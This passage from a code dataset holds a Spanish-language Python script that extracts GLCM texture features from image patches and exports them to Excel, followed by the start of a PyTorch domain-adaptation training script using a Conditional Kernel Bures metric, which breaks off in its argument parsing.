  plt.imshow(cropped)\ndef tama(a,b):\n    if a<600 or b<600:\n        tamañoA = 200\n        tamañoB = 200\n    else:\n        tamañoA = 600\n        tamañoB = 600\n    return tamañoA,tamañoB\n    \nenergiaDM_LH=[]\nhomogeneidadDM_LH=[]\ncorrelacionDM_LH=[]\ndisimiDM_LH=[]\nASMDM_LH=[]\nentropiaDM_LH=[]\ncontrasteDM_LH=[]\nmediaglcmDM_LH=[] \nentropianoglcmDM_LH=[]\nmediaDM_LH=[]\nmodaDM_LH=[] \ndesviacionDM_LH=[]\ncurtosisDM_LH=[]\nnergianoglcmDM_LH=[]\n 
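# feature accumulators: one list per texture feature, per patch class (DM / RE / NO) and per variant (_SF = computed without the Fourier transform)\n 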
##RE\nenergiaRE_LH=[]\nhomogeneidadRE_LH=[]\ncorrelacionRE_LH=[]\ndisimiRE_LH=[]\nASMRE_LH=[]\nentropiaRE_LH=[]\ncontrasteRE_LH=[]\nmediaglcmRE_LH=[]\nentropianoglcmRE_LH=[]\nmediaRE_LH=[]\nmodaRE_LH=[]\ndesviacionRE_LH=[]\ncurtosisRE_LH=[]\nnergianoglcmRE_LH=[]\n ##NO\nenergiaNO_LH=[]\nhomogeneidadNO_LH=[]\ncorrelacionNO_LH=[]\ndisimiNO_LH=[]\nASMNO_LH=[]\nentropiaNO_LH=[]\ncontrasteNO_LH=[]\nmediaglcmNO_LH=[]\nentropianoglcmNO_LH=[]\nmediaNO_LH=[]\nmodaNO_LH=[]\ndesviacionNO_LH=[]\ncurtosisNO_LH=[]\nnergianoglcmNO_LH=[]\n \n ##GLCMsinfourierLL\nenergiaDM_SF_LH=[]\nhomogeneidadDM_SF_LH=[]\ncorrelacionDM_SF_LH=[]\ndisimiDM_SF_LH=[]\nASMDM_SF_LH=[]\nentropiaDM_SF_LH=[]\ncontrasteDM_SF_LH=[]\nmediaglcmDM_SF_LH=[]\nentropianoglcmDM_SF_LH=[]\nmediaDM_SF_LH=[]\nmodaDM_SF_LH=[]\ndesviacionDM_SF_LH=[]\ncurtosisDM_SF_LH=[]\nnergianoglcmDM_SF_LH=[]\n #RE\nenergiaRE_SF_LH=[]\nhomogeneidadRE_SF_LH=[]\ncorrelacionRE_SF_LH=[]\ndisimiRE_SF_LH=[]\nASMRE_SF_LH=[]\nentropiaRE_SF_LH=[]\ncontrasteRE_SF_LH=[]\nmediaglcmRE_SF_LH=[]\nentropianoglcmRE_SF_LH=[]\nmediaRE_SF_LH=[]\nmodaRE_SF_LH=[]\ndesviacionRE_SF_LH=[]\ncurtosisRE_SF_LH=[]\nnergianoglcmRE_SF_LH=[]\n #NO\nenergiaNO_SF_LH=[]\nhomogeneidadNO_SF_LH=[]\ncorrelacionNO_SF_LH=[]\ndisimiNO_SF_LH=[]\nASMNO_SF_LH=[]\nentropiaNO_SF_LH=[]\ncontrasteNO_SF_LH=[]\nmediaglcmNO_SF_LH=[]\nentropianoglcmNO_SF_LH=[]\nmediaNO_SF_LH=[]\nmodaNO_SF_LH=[]\ndesviacionNO_SF_LH=[]\ncurtosisNO_SF_LH=[]\nnergianoglcmNO_SF_LH=[]\n\n\nfor image in glob.glob('*.jpg'):\n # image = '00002.jpg'\n im = cv2.imread(image)\n im=cv2.normalize(im, None, 0, 255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\n aa,bb,c = im.shape \n imaROI=ROI(im)\n imaROI=cv2.normalize(imaROI, None, 0, 1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\n \n #cv2.imshow('Grays',imaROI)\n #cv2.destroyAllWindows()\n HSV=cv2.cvtColor(im,cv2.COLOR_RGB2HSV)\n H,S,V=cv2.split(HSV)\n V=V*imaROI\n \n for z in range(c):\n im[:,:,z]=im[:,:,z]*imaROI\n \n \n _,contours,_= cv2.findContours(imaROI,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt=contours[max_index]\n x3,y3,w3,h3 = cv2.boundingRect(cnt)\n #cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n #\"\"\" \n# cv2.imshow(\"Show\",im[y:y+h,x:x+w])\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n# imf=im.copy()\n# cv2.rectangle(imf,(x,y),(x+w,y+h),(0,255,0),2)\n# cv2.imshow(\"Show\",imf)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n #\"\"\"\n #plt.imshow(im)\n #plt.show()\n #imagenROI=im*imaROI\n filetxt=image[0:len(image)-3]+'txt' \n bboxfile=filetxt\n boxes = read_boxes(bboxfile)\n boxes_abs = yolo2voc(boxes, im.shape) \n re=0\n dm=0\n imunda=0\n imSinBBOX=im.copy()\n \n \n for b in boxes_abs:\n cls, x1, y1, x2, y2 = b\n if cls == 3:\n print('DM')\n \n dm=dm+1 \n #print(image,dm)\n a,b= V[int(y1):int(y2),int(x1):int(x2)].shape\n tamañoA,tamañoB=tama(a,b)\n V1= V[int(y1):int(y2),int(x1):int(x2)]\n vecesA = int(a/tamañoA)\n vecesB = int(b/tamañoB)\n \n for f in range(0,a-tamañoA,tamañoA):\n for c in range(0,b-tamañoB,tamañoB):\n #print(f,c)\n cropped = V1[f:f+tamañoA,c:c+tamañoB]\n croppedrgb = im[f:f+tamañoA,c:c+tamañoB]\n \n #test2[f:f+tamañoA,c:c+tamañoB]=test[f:f+tamañoA,c:c+tamañoB]\n if c==tamañoB*vecesB-tamañoB:\n cropped = V1[f:f+tamañoA,c:]\n croppedrgb = im[f:f+tamañoA,c:]\n #test2[f:f+tamañoA,c:]=test[f:f+tamañoA,c:]\n if f==tamañoA*vecesA-tamañoA:\n #print('ola')\n if c==tamañoB*vecesB-tamañoB:\n cropped = V1[f:,c:]\n croppedrgb = im[f:,c:]\n \n #test2[f:,c:]=test[f:,c:]\n else:\n 
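# last row of tiles: extend down to the bottom edge but keep the regular tile width\n                            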
cropped = V1[f:,c:c+tamañoB]\n croppedrgb = im[f:,c:c+tamañoB]\n \n #test2[f:,c:c+tamañoB]=test[f:,c:c+tamañoB]\n #print('dani')\n #cropFou=cropped\n cropped_1=cropped.copy()\n croppedrgb_1=croppedrgb.copy()\n cropFou=Fourier(cropped)\n ch= cropFou.shape\n if len(ch)>2:\n cropFou=cropFou[:,:,0]\n \n g,contraste,energia,homogeneidad, correlacion, disimi, ASM,entropia=GLCM(cropFou)\n contrasteDM_LH.append(contraste)\n energiaDM_LH.append(energia)\n homogeneidadDM_LH.append(homogeneidad)\n correlacionDM_LH.append(correlacion)\n disimiDM_LH.append(disimi)\n ASMDM_LH.append(ASM)\n entropiaDM_LH.append(entropia)\n mediaglcmDM_LH.append(np.mean(g)) \n entropianoglcmDM_LH.append(skimage.measure.shannon_entropy(cropFou))\n mediaDM_LH.append(np.mean(cropFou))\n modaDM_LH.append(np.median(g)) \n desviacionDM_LH.append(np.var(cropFou))\n curtosisDM_LH.append(sum(kurtosis(cropFou)))\n nergianoglcmDM_LH.append(np.median(cropFou))\n \"\"\" #Sin Fourier \"\"\"\n cropFou_1=cropped_1\n ch= cropFou_1.shape\n if len(ch)>2:\n cropFou_1=cropFou_1[:,:,0]\n \n g_1,contraste_1,energia_1,homogeneidad_1, correlacion_1, disimi_1, ASM_1,entropia_1=GLCM(cropFou_1)\n contrasteDM_SF_LH.append(contraste_1)\n energiaDM_SF_LH.append(energia_1)\n homogeneidadDM_SF_LH.append(homogeneidad_1)\n correlacionDM_SF_LH.append(correlacion_1)\n disimiDM_SF_LH.append(disimi_1)\n ASMDM_SF_LH.append(ASM_1)\n entropiaDM_SF_LH.append(entropia_1)\n mediaglcmDM_SF_LH.append(np.mean(g_1)) \n entropianoglcmDM_SF_LH.append(skimage.measure.shannon_entropy(cropFou_1))\n mediaDM_SF_LH.append(np.mean(cropFou_1))\n modaDM_SF_LH.append(np.median(g_1)) \n desviacionDM_SF_LH.append(np.var(cropFou_1))\n curtosisDM_SF_LH.append(sum(kurtosis(cropFou_1)))\n nergianoglcmDM_SF_LH.append(np.median(cropFou_1))\n \n\n if cls==0:\n re=re+1 \n print(re)\n if cls==2:\n imunda=imunda+1\n# imSinBBOX[int(y1):int(y2),int(x1):int(x2)]=0\n \n# print('cls', cls)\n# if cls!=0 and cls!=1 and cls!=2 and cls!=3 and cls!=4 and cls!=5 and cls!=6:\n# plt.imshow(im)\n# plt.show() \n# re=re+1\n if re > 0 and dm==0 and imunda==0:\n inta=V[y3:y3+h3,x3:x3+w3]\n aa,bb=inta.shape\n tamañoA,tamañoB=tama(aa,bb)\n vecesA = int(aa/tamañoA)\n vecesB = int(bb/tamañoB)\n \n for f in range(0,aa-tamañoA,tamañoA):\n for c in range(0,bb-tamañoB,tamañoB):\n cropped2 = inta[f:f+tamañoA,c:c+tamañoB]\n croppedrgb2 = im[f:f+tamañoA,c:c+tamañoB]\n if c==tamañoB*vecesB-tamañoB:\n cropped2 = inta[f:f+tamañoA,c:]\n croppedrgb2 = im[f:f+tamañoA,c:]\n if f==tamañoA*vecesA-tamañoA:\n if c==tamañoB*vecesB-tamañoB:\n cropped2 = inta[f:,c:]\n croppedrgb2 = im[f:,c:]\n else:\n cropped2 = inta[f:,c:c+tamañoB]\n croppedrgb2 = im[f:,c:c+tamañoB]\n cropped2_1=cropped2.copy()\n croppedrgb2_1=croppedrgb2.copy()\n\n \"\"\" #Con Fourier\"\"\"\n cropFou2=Fourier(cropped2)\n ch= cropFou2.shape\n if len(ch)>2:\n cropFou2=cropFou2[:,:,0]\n \n g2,contraste2,energia2,homogeneidad2, correlacion2, disimi2, ASM2,entropia2=GLCM(cropFou2)\n contrasteRE_LH.append(contraste2)\n energiaRE_LH.append(energia2)\n homogeneidadRE_LH.append(homogeneidad2)\n correlacionRE_LH.append(correlacion2)\n disimiRE_LH.append(disimi2)\n ASMRE_LH.append(ASM2)\n entropiaRE_LH.append(entropia2)\n mediaglcmRE_LH.append(np.mean(g2)) \n entropianoglcmRE_LH.append(skimage.measure.shannon_entropy(cropFou2))\n mediaRE_LH.append(np.mean(cropFou2))\n modaRE_LH.append(np.median(g2)) \n desviacionRE_LH.append(np.var(cropFou2))\n curtosisRE_LH.append(sum(kurtosis(cropFou2)))\n nergianoglcmRE_LH.append(np.median(cropFou2))\n \"\"\" #Sin Fourier\"\"\"\n cropFou2_1= 
cropped2_1\n ch= cropFou2_1.shape\n if len(ch)>2:\n cropFou2_1=cropFou2_1[:,:,0]\n \n g2_1,contraste2_1,energia2_1,homogeneidad2_1, correlacion2_1, disimi2_1, ASM2_1,entropia2_1=GLCM(cropFou2_1)\n contrasteRE_SF_LH.append(contraste2_1)\n energiaRE_SF_LH.append(energia2_1)\n homogeneidadRE_SF_LH.append(homogeneidad2_1)\n correlacionRE_SF_LH.append(correlacion2_1)\n disimiRE_SF_LH.append(disimi2_1)\n ASMRE_SF_LH.append(ASM2_1)\n entropiaRE_SF_LH.append(entropia2_1)\n mediaglcmRE_SF_LH.append(np.mean(g2_1)) \n entropianoglcmRE_SF_LH.append(skimage.measure.shannon_entropy(cropFou2_1))\n mediaRE_SF_LH.append(np.mean(cropFou2_1))\n modaRE_SF_LH.append(np.median(g2_1)) \n desviacionRE_SF_LH.append(np.var(cropFou2_1))\n curtosisRE_SF_LH.append(sum(kurtosis(cropFou2_1)))\n nergianoglcmRE_SF_LH.append(np.median(cropFou2_1))\n \n if re==0 and dm==0 and imunda==0:\n inta3=V[y3:y3+h3,x3:x3+w3]\n aaa,bbb=inta3.shape\n tamañoA,tamañoB=tama(aaa,bbb)\n vecesA = int(aaa/tamañoA)\n vecesB = int(bbb/tamañoB)\n \n for f in range(0,aaa-tamañoA,tamañoA):\n for c in range(0,bbb-tamañoB,tamañoB):\n cropped3 = inta3[f:f+tamañoA,c:c+tamañoB]\n croppedrgb3 = im[f:f+tamañoA,c:c+tamañoB]\n if c==tamañoB*vecesB-tamañoB:\n cropped3 = inta3[f:f+tamañoA,c:]\n croppedrgb3 = im[f:f+tamañoA,c:]\n if f==tamañoA*vecesA-tamañoA:\n if c==tamañoB*vecesB-tamañoB:\n cropped3 = inta3[f:,c:]\n croppedrgb3 = im[f:,c:]\n else:\n cropped3 = inta3[f:,c:c+tamañoB]\n croppedrgb3 = im[f:,c:c+tamañoB]\n cropped3_1=cropped3.copy()\n croppedrgb3_1=croppedrgb3.copy()\n\n \"\"\" #Con Fourier\"\"\"\n cropFou3=Fourier(cropped3)\n ch= cropFou3.shape\n if len(ch)>2:\n cropFou3=cropFou3[:,:,0]\n \n g3,contraste3,energia3,homogeneidad3, correlacion3, disimi3, ASM3,entropia3=GLCM(cropFou3)\n contrasteNO_LH.append(contraste3)\n energiaNO_LH.append(energia3)\n homogeneidadNO_LH.append(homogeneidad3)\n correlacionNO_LH.append(correlacion3)\n disimiNO_LH.append(disimi3)\n ASMNO_LH.append(ASM3)\n entropiaNO_LH.append(entropia3)\n mediaglcmNO_LH.append(np.mean(g3)) \n entropianoglcmNO_LH.append(skimage.measure.shannon_entropy(cropFou3))\n mediaNO_LH.append(np.mean(cropFou3))\n modaNO_LH.append(np.median(g3)) \n desviacionNO_LH.append(np.var(cropFou3))\n curtosisNO_LH.append(sum(kurtosis(cropFou3)))\n nergianoglcmNO_LH.append(np.median(cropFou3))\n \"\"\" #Sin Fourier\"\"\"\n cropFou3_1= cropped3_1\n ch= cropFou3_1.shape\n if len(ch)>2:\n cropFou3_1=cropFou3_1[:,:,0]\n \n g3_1,contraste3_1,energia3_1,homogeneidad3_1, correlacion3_1, disimi3_1, ASM3_1,entropia3_1=GLCM(cropFou3_1)\n contrasteNO_SF_LH.append(contraste3_1)\n energiaNO_SF_LH.append(energia3_1)\n homogeneidadNO_SF_LH.append(homogeneidad3_1)\n correlacionNO_SF_LH.append(correlacion3_1)\n disimiNO_SF_LH.append(disimi3_1)\n ASMNO_SF_LH.append(ASM3_1)\n entropiaNO_SF_LH.append(entropia3_1)\n mediaglcmNO_SF_LH.append(np.mean(g3_1)) \n entropianoglcmNO_SF_LH.append(skimage.measure.shannon_entropy(cropFou3_1))\n mediaNO_SF_LH.append(np.mean(cropFou3_1))\n modaNO_SF_LH.append(np.median(g3_1)) \n desviacionNO_SF_LH.append(np.var(cropFou3_1))\n curtosisNO_SF_LH.append(sum(kurtosis(cropFou3_1)))\n nergianoglcmNO_SF_LH.append(np.median(cropFou3_1))\n ###ROJO\n \n \n \nimport pandas as pd \ndatos = {'EnergiaDM':energiaDM_LH,\n 'HomogeneidadDM':homogeneidadDM_LH,\n 'CorrelaciónDM':correlacionDM_LH,\n 'DisimilitudDM':disimiDM_LH,\n 'ASM_DM':ASMDM_LH,\n 'EntropíaDM':entropiaDM_LH,\n 'ContrasteDM':contrasteDM_LH,\n 'Media(glcm)DM':mediaglcmDM_LH,\n 'Entropia(no glcm)DM':entropianoglcmDM_LH,\n 'MediaDM':mediaDM_LH,\n 
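# keys become the Excel column headers; each list holds one value per analyzed DM patch\n 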
'MedianaGLCM':modaDM_LH,\n 'VarianzaDM':desviacionDM_LH,\n 'CurtosisDM':curtosisDM_LH,\n 'Energia(no glcm)DM_LH':nergianoglcmDM_LH,\n 'Mediana':energiaDM_SF_LH,\n 'HomogeneidadDM(sinF)_LH':homogeneidadDM_SF_LH,\n 'CorrelaciónDM(sinF)_LH':correlacionDM_SF_LH,\n 'DisimilitudDM(sinF)_LH':disimiDM_SF_LH,\n 'ASMDM(sinF)_LH':ASMDM_SF_LH,\n 'EntropíaDM(sinF)_LH':entropiaDM_SF_LH,\n 'ContrasteDM(sinF)_LH':contrasteDM_SF_LH,\n 'Media(glcm)DM(sinF)_LH':mediaglcmDM_SF_LH,\n 'Entropia(no glcm)DM(sinF)_LH':entropianoglcmDM_SF_LH,\n 'MediaDM(sinF)_LH':mediaDM_SF_LH,\n 'MedianaGLCM_SF':modaDM_SF_LH,\n 'VarianzaDM(sinF)_LH':desviacionDM_SF_LH,\n 'CurtosisDM(sinF)_LH':curtosisDM_SF_LH,\n 'MedianaSF':nergianoglcmDM_SF_LH}\n\ndatos = pd.DataFrame(datos)\ndatos.to_excel('CaracteristicasGLCM_DM.xlsx') \n\ndatos = {'EnergiaRE_LH':energiaRE_LH,\n 'HomogeneidadRE_LH':homogeneidadRE_LH,\n 'CorrelaciónRE_LH':correlacionRE_LH,\n 'DisimilitudRE_LH':disimiRE_LH,\n 'ASM_RE_LH':ASMRE_LH,\n 'EntropíaRE_LH':entropiaRE_LH,\n 'ContrasteRE_LH':contrasteRE_LH,\n 'Media(glcm)RE_LH':mediaglcmRE_LH,\n 'Entropia(no glcm)RE_LH':entropianoglcmRE_LH,\n 'MediaRE_LH':mediaRE_LH,\n 'MedianaGLCMRE_LH':modaRE_LH,\n 'VarianzaRE_LH':desviacionRE_LH,\n 'CurtosisRE_LH':curtosisRE_LH,\n 'Mediana(no glcm)RE_LH':nergianoglcmRE_LH,\n 'EnergiaRE(sinF)_LH':energiaRE_SF_LH,\n 'HomogeneidadRE(sinF)_LH':homogeneidadRE_SF_LH,\n 'CorrelaciónRE(sinF)_LH':correlacionRE_SF_LH,\n 'DisimilitudRE(sinF)_LH':disimiRE_SF_LH,\n 'ASMRE(sinF)_LH':ASMRE_SF_LH,\n 'EntropíaRE(sinF)_LH':entropiaRE_SF_LH,\n 'ContrasteRE(sinF)_LH':contrasteRE_SF_LH,\n 'Media(glcm)RE(sinF)_LH':mediaglcmRE_SF_LH,\n 'Entropia(no glcm)RE(sinF)_LH':entropianoglcmRE_SF_LH,\n 'MediaRE(sinF)_LH':mediaRE_SF_LH,\n 'MedianaGLCMRE(sinF)_LH':modaRE_SF_LH,\n 'VarianzaRE(sinF)_LH':desviacionRE_SF_LH,\n 'CurtosisRE(sinF)_LH':curtosisRE_SF_LH,\n 'mediana(no glcm)RE(sinF)_LH':nergianoglcmRE_SF_LH}\ndatos = pd.DataFrame(datos)\ndatos.to_excel('CaracteristicasGLCM_RE.xlsx') \n \n \n ##NO\ndatos={ 'EnergiaNO_LH':energiaNO_LH,\n 'HomogeneidadNO_LH':homogeneidadNO_LH,\n 'CorrelaciónNO_LH':correlacionNO_LH,\n 'DisimilitudNO_LH':disimiNO_LH,\n 'ASM_NO_LH':ASMNO_LH,\n 'EntropíaNO_LH':entropiaNO_LH,\n 'ContrasteNO_LH':contrasteNO_LH,\n 'Media(glcm)NO_LH':mediaglcmNO_LH,\n 'Entropia(no glcm)NO_LH':entropianoglcmNO_LH,\n 'MediaNO_LH':mediaNO_LH,\n 'MedianaGLCMNO_LH':modaNO_LH,\n 'VarianzanNO_LH':desviacionNO_LH,\n 'CurtosisNO_LH':curtosisNO_LH,\n 'Mediana(no glcm)NO_LH':nergianoglcmNO_LH,\n 'EnergiaNO(sinF)_LH':energiaNO_SF_LH,\n 'HomogeneidadNO(sinF)_LH':homogeneidadNO_SF_LH,\n 'CorrelaciónNO(sinF)_LH':correlacionNO_SF_LH,\n 'DisimilitudNO(sinF)_LH':disimiNO_SF_LH,\n 'ASMNO(sinF)_LH':ASMNO_SF_LH,\n 'EntropíaNO(sinF)_LH':entropiaNO_SF_LH,\n 'ContrasteNO(sinF)_LH':contrasteNO_SF_LH,\n 'Media(glcm)NO(sinF)_LH':mediaglcmNO_SF_LH,\n 'Entropia(no glcm)NO(sinF)_LH':entropianoglcmNO_SF_LH,\n 'MediaNO(sinF)_LH':mediaNO_SF_LH,\n 'MedianaGLCMNO(sinF)_LH':modaNO_SF_LH,\n 'VarianzaNO(sinF)_LH':desviacionNO_SF_LH,\n 'CurtosisNO(sinF)_LH':curtosisNO_SF_LH,\n 'Mediana(no glcm)NO(sinF)_LH':nergianoglcmNO_SF_LH}\n \ndatos = pd.DataFrame(datos)\ndatos.to_excel('CaracteristicasGLCM_NO.xlsx') \n ","repo_name":"NatalyTinoco/Trabajo-de-grado_Artefactos","sub_path":"TODAAS/GLCM500x500.py","file_name":"GLCM500x500.py","file_ext":"py","file_size_in_byte":20251,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12865251483","text":"# -*- coding: utf-8 -*-\n\nimport network\nimport 
data_loader\nimport CKButils\nimport numpy as np\nimport scipy.io as io\nfrom torch.utils import model_zoo\nimport torch\nfrom datetime import datetime\nimport sys\nimport os\nimport argparse\n\n\n##################################\n# Set Parameter\n##################################\n# Your own path\ndata_folder = './dataset' # path of dataset\nsave_folder = './results' # path for saving results\nlog_folder = './logs' # path for saving logs\nmodel_dir = './pre_model/' # path of pretrained model\n\n##################################\n# Experiment Main Function\n##################################\ndef Experiment_Main(config):\n # Parameter\n dataset = config['dataset']\n net = config['net']\n model = config['model']\n FC_dim_1 = int(config['FC_dim_1'])\n FC_dim_2 = int(config['FC_dim_2'])\n exp_times = int(config['exp_times'])\n epochs = int(config['epochs'])\n batch_size = int(config['batch_size'])\n Tar_Ent_lambda = float(config['Tar_Ent_lambda'])\n CKB_lambda = float(config['CKB_lambda'])\n CKB_type = config['CKB_type']\n Tar_Ent_epoch = int(config['Tar_Ent_epoch'])\n CKB_epoch = int(config['CKB_epoch'])\n inv_epsilon = float(config['inv_epsilon'])\n lr = float(config['lr'])\n optim_param = config['optim_param']\n \n if os.path.exists(log_folder) is False:\n os.mkdir(log_folder)\n log_name = '%1s_%1s_%1s_EntEpoch%1s_EntLam%1s_CKBEpoch%1s_CKBLam%1s_epsilon%1s_lr%1s.txt'%(dataset,net,model,Tar_Ent_epoch,Tar_Ent_lambda,CKB_epoch,CKB_lambda,inv_epsilon,lr)\n log_file = open(os.path.join(log_folder,log_name), \"w\")\n \n ##################################\n # Prepare Data\n ##################################\n if net == 'AlexNet':\n alexnet = True\n else:\n alexnet = False\n source_domain_set, target_domain_set, task_set, num_cls = data_loader.get_tasks(dataset)\n Source_Acc_Recorder = np.zeros((exp_times,len(task_set)))\n Target_Acc_Recorder = np.zeros((exp_times,len(task_set)))\n for task_iter in range(len(task_set)):\n source_domain = source_domain_set[task_iter]\n target_domain = target_domain_set[task_iter]\n task = task_set[task_iter]\n # Training loader\n source_tr_loader = data_loader.loader(dataset,data_folder,source_domain,\n batch_size,alexnet,train=True)\n target_tr_loader = data_loader.loader(dataset,data_folder,target_domain,\n batch_size,alexnet,train=True)\n # Testing loader\n source_te_loader = data_loader.loader(dataset,data_folder,source_domain,\n batch_size,alexnet,train=False)\n target_te_loader = data_loader.loader(dataset,data_folder,target_domain,\n batch_size,alexnet,train=False)\n ##################################\n # Random Experiments\n ##################################\n for exp_iter in range(exp_times):\n ##################################\n # Initialize network and optimizer\n ##################################\n # Network\n if net == 'AlexNet':\n # ImageNet pretrained AlexNet\n DNN = network.AlexNet_Feature()\n FC_input_dim = 4096\n elif net == 'ResNet-50':\n # ImageNet pretrained ResNet\n if os.path.exists(model_dir) is False:\n os.mkdir(model_dir)\n DNN = network.ResNet50(network.Bottleneck, [3, 4, 6, 3])\n FC_input_dim = 2048\n url = 'https://download.pytorch.org/models/resnet50-19c8e357.pth'\n pretrained_dict = model_zoo.load_url(url,model_dir)\n del pretrained_dict['fc.bias']\n del pretrained_dict['fc.weight']\n DNN.load_state_dict(pretrained_dict)\n del pretrained_dict\n else:\n sys.exit('Error: invalid network')\n \n FC = network.FC_Layers(FC_input_dim,FC_dim_1,FC_dim_2,num_cls)\n FC.apply(CKButils.weights_init)\n FC.cuda()\n DNN.cuda()\n \n # 
Optimizer\n if optim_param == 'GD':\n optimizer_dict = [{\"params\": filter(lambda p: p.requires_grad, DNN.parameters()), \"lr\": 1},\n {\"params\": filter(lambda p: p.requires_grad, FC.parameters()), \"lr\": 10}]\n optimizer = torch.optim.SGD(optimizer_dict, lr=lr, momentum=0.9, weight_decay=0.0005, nesterov=True)\n param_lr = []\n for param_group in optimizer.param_groups:\n param_lr.append(param_group[\"lr\"])\n elif optim_param == 'Adam':\n beta1=0.9\n beta2=0.999\n optimizer = torch.optim.Adam([{'params':DNN.parameters(), 'lr': lr*0.1},\n {'params':FC.parameters()}], lr*1.5,\n [beta1, beta2], weight_decay=0.01)\n else:\n sys.exit('Error: invalid optimizer')\n \n ####################\n # Training \n ####################\n iter_optim = 1\n for step in range(epochs):\n epoch_time_start = datetime.now()\n ####################\n # Mini-batch training \n ####################\n for (X_s, lab_s), (X_t, lab_t) in zip(source_tr_loader,target_tr_loader):\n # switch to training mode\n DNN.train()\n FC.train()\n \n if optim_param == 'GD':\n # upadate lr\n optimizer = CKButils.inv_lr_scheduler(param_lr, optimizer, iter_optim, init_lr=lr, gamma=0.001, power=0.75,\n weight_decay=0.0005)\n iter_optim += 1\n \n # load data\n X_s, lab_s = CKButils.to_var(X_s), CKButils.to_var(lab_s)\n X_t, lab_t = CKButils.to_var(X_t), CKButils.to_var(lab_t)\n \n # Init gradients\n DNN.zero_grad()\n FC.zero_grad()\n \n # Forward propagate\n Z_s, prob_s = FC(DNN(X_s))\n Z_t, prob_t = FC(DNN(X_t))\n plab_t = prob_t.detach().max(1)[1]\n \n # norm_s = Z_s.pow(2).detach().sum(1).pow(1/2).unsqueeze(1)\n # norm_t = Z_t.pow(2).detach().sum(1).pow(1/2).unsqueeze(1) \n # Z_s = (Z_s.mul(1/norm_s))*1e1\n # Z_t = (Z_t.mul(1/norm_t))*1e1\n \n ####################\n # Loss Objective\n ####################\n # Cross-Entropy\n CE_loss = CKButils.Cross_Entropy(prob_s, lab_s)\n \n # Entropy\n if step <= (Tar_Ent_epoch - 1):\n Tar_Ent_loss = torch.zeros(1).squeeze(0).cuda()\n else:\n Tar_Ent_loss = Tar_Ent_lambda*CKButils.Entropy(prob_t)\n \n # CKB Matching Loss\n if step <= (CKB_epoch - 1):\n Match_loss = torch.zeros(1).squeeze(0).cuda()\n else:\n if model == 'CKB':\n CKB_loss = CKB_lambda*CKButils.CKB_Metric(Z_s,Z_t,lab_s,plab_t,prob_t,num_cls,inv_epsilon,CKB_type)\n Match_loss = CKB_loss\n elif model == 'CKB+MMD':\n OneHot_s = torch.zeros(lab_s.shape[0],num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach()\n CKB_loss = CKB_lambda*CKButils.CKB_Metric(Z_s,Z_t,lab_s,plab_t,prob_t,num_cls,inv_epsilon,CKB_type)\n MMD_y_loss = CKB_lambda*CKButils.MMD_Metric(OneHot_s,prob_t)\n Match_loss = CKB_loss + MMD_y_loss\n else:\n sys.exit('Error: invalid model')\n \n # Overall Loss\n O_loss = CE_loss + Tar_Ent_loss + Match_loss\n \n # Backward propagate\n O_loss.backward()\n optimizer.step()\n torch.cuda.empty_cache()\n \n ####################\n # Testing \n ####################\n # switch to testing mode\n DNN.eval()\n FC.eval()\n # evaluate Model\n source_acc = CKButils.classification_accuracy(source_te_loader,DNN,FC)*100\n target_acc = CKButils.classification_accuracy(target_te_loader,DNN,FC)*100\n \n ####################\n # Report results\n ####################\n # time\n epoch_time_end = datetime.now()\n seconds = (epoch_time_end - epoch_time_start).seconds\n minutes = seconds//60\n second = seconds%60\n hours = minutes//60\n minute = minutes%60\n # print result\n print('====================== [%1s] %1s→%1s: Experiment %1s Epoch %1s ================='%(dataset,source_domain,target_domain,exp_iter+1,step+1))\n print('Source Accuracy: 
%1s'%source_acc)\n print('Target Accuracy: %1s'%target_acc)\n print('Cross-Entropy Loss: %1s'%(CE_loss.data.data.cpu().numpy()))\n print('Target Entropy Loss: %1s'%(Tar_Ent_loss.data.cpu().numpy()))\n print('Matching Loss: %1s'%(Match_loss.data.cpu().numpy()))\n print('Overall Loss: %1s'%(O_loss.data.cpu().numpy()))\n print('Current epoch [train & test] time cost: %1s Hour %1s Minutes %1s Seconds'%(hours,minute,second))\n if target_acc == 1:\n print('Reach accuracy {1} at Epoch %1s !'%(step+1))\n break\n # write log file\n log_str = '%1s | [%1s] %1s→%1s: Experiment %1s Epoch %1s, target accuracy %1s:'%(epoch_time_end,dataset,source_domain,target_domain,exp_iter+1,step+1,target_acc)\n log_file.write(log_str+'\\n')\n log_file.flush()\n # empty network cache\n torch.cuda.empty_cache()\n \n ####################\n # Record results\n ####################\n Source_Acc_Recorder[exp_iter,task_iter] = source_acc\n Target_Acc_Recorder[exp_iter,task_iter] = target_acc\n \n ####################\n # Save results\n ####################\n if os.path.exists(save_folder) is False:\n os.mkdir(save_folder)\n result_dict = config\n result_dict['Source_ACC'] = Source_Acc_Recorder\n result_dict['Target_ACC'] = Target_Acc_Recorder\n file_name = '%1s_%1s_%1s_EntEpoch%1s_EntLam%1s_CKBEpoch%1s_CKBLam%1s_epsilon%1s_lr%1s.mat'%(dataset,net,model,Tar_Ent_epoch,Tar_Ent_lambda,CKB_epoch,CKB_lambda,inv_epsilon,lr)\n \n io.savemat(os.path.join(save_folder,file_name),result_dict)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Conditional Kernel Bures Metric CVPR-2021')\n parser.add_argument('--dataset', type=str, default='ImageCLEF', choices=['ImageCLEF', 'OfficeHome', 'Office10', 'RefurbishedOffice31'])\n parser.add_argument('--net', type=str, default='ResNet-50', choices=['ResNet-50', 'AlexNet'])\n parser.add_argument('--model', type=str, default='CKB', choices=['CKB', 'CKB+MMD'])\n parser.add_argument('--FC_dim_1', type=str, default='1024', help=\"dimension of the 1st FC layer\")\n parser.add_argument('--FC_dim_2', type=str, default='512', help=\"dimension of the 2nd FC layer\")\n parser.add_argument('--exp_times', type=str, default='10', help=\"numbers of random experiment\")\n parser.add_argument('--epochs', type=str, default='150', help=\"maximum training epochs\")\n parser.add_argument('--batch_size', type=str, default='40', help=\"training batch_size; 40 for ResNet-50 and 128 for AlexNet\")\n parser.add_argument('--Tar_Ent_lambda', type=str, default='5e-2', help=\"lambda_1 in paper\")\n parser.add_argument('--CKB_lambda', 